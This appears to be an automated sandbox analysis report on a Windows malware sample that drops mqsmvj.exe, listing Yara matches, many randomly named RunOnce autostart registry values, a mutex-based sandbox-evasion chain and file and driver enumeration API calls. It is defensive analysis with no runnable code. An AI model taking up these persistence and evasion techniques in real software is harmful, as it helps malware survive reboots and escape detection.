Source: Yara match	File source: 37.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000000.542136140.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.302753635.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.543716929.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.246598852.000000000F14A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.598200905.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000000.583307214.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.518024199.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.415482571.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.373855926.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.437171123.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.344076256.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.321306914.0000000003290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.560904578.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.634796069.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.433686067.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.501007155.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.693057490.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.473313238.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.607979017.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.435943163.0000000003930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.495173424.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.681141144.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.284909876.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.502607674.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.374541763.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.472905613.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.650224978.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.366415830.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.502804269.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.638106882.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.373224342.00000000032B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.345391884.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.455550683.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.384391365.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.406139264.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.678365276.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.326861802.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.343391224.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000000.674598119.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.631210947.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.403183321.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.296444653.0000000003790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.559852565.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.593533053.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.436990656.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.720225413.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.257187894.0000000003210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: IJr8RvvhZ3.exe PID: 732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 4652, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 5964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 5524, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 3824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 5304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 4828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 2228, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 4940, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 4864, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 5160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 5636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 2564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 4956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 4480, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 5768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 6000, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 3780, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe, type: DROPPED

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe

Code function: 0_2_0F148400 VirtualAlloc,CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,

0_2_0F148400

Source: IJr8RvvhZ3.exe	Static PE information: real checksum: 0x120f7 should be: 0x1dffd
Source: mqsmvj.exe.0.dr	Static PE information: real checksum: 0x120f7 should be: 0x1ad96

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe

Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce soasnzfwfwv	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zutkqlfvbho
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xbugmifmcap	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce yzthpvkcmuu	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce eeukvfrmhuc	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ponrvbljnrm
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce rpklcocahbn
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qwipuxgrdpk	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce dpmkfuaielt	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce mqqawysoqgr
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zmiqihkfrbh
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce bahswixbtvj	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce tlrxymtwiqr	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xxjrkojdmxk	Jump to behavior

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qwipuxgrdpk	Jump to behavior
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qwipuxgrdpk	Jump to behavior
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qwipuxgrdpk	Jump to behavior
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qwipuxgrdpk	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce tlrxymtwiqr	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce tlrxymtwiqr	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce tlrxymtwiqr	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce tlrxymtwiqr	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce soasnzfwfwv	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce soasnzfwfwv	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce soasnzfwfwv	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce soasnzfwfwv	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xxjrkojdmxk	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xxjrkojdmxk	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xxjrkojdmxk	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xxjrkojdmxk	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xbugmifmcap	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xbugmifmcap	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xbugmifmcap	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce xbugmifmcap	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce bahswixbtvj	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce bahswixbtvj	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce bahswixbtvj	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce bahswixbtvj	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce dpmkfuaielt	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce dpmkfuaielt	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce dpmkfuaielt	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce dpmkfuaielt	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce eeukvfrmhuc	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce eeukvfrmhuc	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce eeukvfrmhuc	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce eeukvfrmhuc	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce yzthpvkcmuu	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce yzthpvkcmuu	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce yzthpvkcmuu	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce yzthpvkcmuu	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ponrvbljnrm
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ponrvbljnrm
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ponrvbljnrm
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ponrvbljnrm
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce mqqawysoqgr
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce mqqawysoqgr
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce mqqawysoqgr
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce mqqawysoqgr
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zutkqlfvbho
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zutkqlfvbho
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zutkqlfvbho
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zutkqlfvbho
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zmiqihkfrbh
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zmiqihkfrbh
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zmiqihkfrbh
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce zmiqihkfrbh
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce rpklcocahbn
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce rpklcocahbn
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce rpklcocahbn
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce rpklcocahbn

Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_3-1806

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Code function: EnumDeviceDrivers,K32EnumDeviceDrivers,VirtualAlloc,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,	0_2_0F142F50
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: EnumDeviceDrivers,K32EnumDeviceDrivers,VirtualAlloc,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,	3_2_0F582F50
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: EnumDeviceDrivers,K32EnumDeviceDrivers,VirtualAlloc,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,	11_2_0F582F50

Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Code function: 0_2_0F146BA0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	0_2_0F146BA0
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Code function: 0_2_0F146DF0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	0_2_0F146DF0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 3_2_0F586DF0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	3_2_0F586DF0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 3_2_0F586BA0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	3_2_0F586BA0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 11_2_0F586DF0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	11_2_0F586DF0
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 11_2_0F586BA0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	11_2_0F586BA0

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	API call chain: ExitProcess graph end node	graph_0-1761
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	API call chain: ExitProcess graph end node	graph_0-1783
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	API call chain: ExitProcess graph end node	graph_0-1980
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	API call chain: ExitProcess graph end node	graph_0-1773
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	API call chain: ExitProcess graph end node	graph_0-1911
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	API call chain: ExitProcess graph end node	graph_3-1754
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	API call chain: ExitProcess graph end node	graph_3-1778
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	API call chain: ExitProcess graph end node	graph_3-1769
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	API call chain: ExitProcess graph end node	graph_3-1970
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	API call chain: ExitProcess graph end node	graph_3-1904
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	API call chain: ExitProcess graph end node	graph_11-1734
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	API call chain: ExitProcess graph end node	graph_11-1925
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	API call chain: ExitProcess graph end node	graph_11-1725
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	API call chain: ExitProcess graph end node	graph_11-1860
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	API call chain: ExitProcess graph end node	graph_11-1710

Source: mqsmvj.exe, 0000000B.00000002.327597151.000000000093A000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000C.00000002.343769957.0000000000838000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000E.00000002.373523162.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 00000019.00000002.501583638.0000000000D18000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe

Code function: 0_2_0F148400 VirtualAlloc,CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,

0_2_0F148400

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe

